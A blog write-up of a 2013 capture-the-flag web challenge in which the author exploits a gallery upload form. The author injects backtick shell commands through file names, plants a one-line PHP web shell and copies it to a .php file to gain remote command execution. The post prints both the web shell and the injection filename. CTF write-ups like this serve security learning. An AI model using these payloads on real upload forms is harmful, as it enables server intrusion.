Sunday, May 12, 2013

BaltCTF - WEB200 "Gallery" write-up

BaltCTF is over and I decided to create a write-up for the second web-based task, because I think it was quite fun. The solution might be old news to more experienced people, but figuring it out on my own was exciting. Here goes.


The task was to hack a simple gallery application where users can upload pictures and view them. It was fairly obvious that there would be a file upload vulnerability, but I decided to check for SQLi first, just in case.

The uploader only accepted png and gif files smaller than 1 MB. The first thing that came to my mind was bypassing this by uploading something named shell.png.php. I tried for almost an hour, but nothing got past the extension check. I even tried putting SQLi into the filename, but that didn't work either.

After many tries I had a new idea that actually worked: I uploaded a file whose name contained a Unix command surrounded by grave accents (backticks). The server evidently passed the file name through a shell, which performed command substitution on the backticks, so the command ran on the server. The uploaded picture's name then contained the id of the picture followed by the output of the executed command. The only problem was that the file name was limited to 16 characters, so each upload revealed only the start of the output, for example:
43-css img


After this I made a bad decision and took a little detour. I decided to write a "shell" that prompts me for commands, creates a file that has the command in its name, uploads the file, views the gallery, finds the picture's file name and prints it out for me. Here is the code in case anybody is interested.

The reason this failed is that the file name could not contain special characters such as '|' or '>'. Then, after thinking about it for a few minutes, I realized that there is a much simpler solution.


The simple solution is the following:
  • Upload a PHP shell with a png extension
  • Rename the file so it has a php extension
So I created a really basic shell in PHP:
<?php echo system($_GET['s']); ?>
I uploaded this as shell.png (the gallery stored it as 65-shell.png, with the picture id prefixed to the name), and then uploaded another file named:
`cd uploads;cd 6a9btoq20khkn8ln5lfhuo6v62;cp 65-shell.png shell.php`.png
The command between the grave accents ran on the server and copied the uploaded shell to shell.php. Semicolons and backticks were not filtered, only '|' and '>' were. This worked and I had a remote shell:

Using the shell I looked around, and a file named "picture" contained the flag.
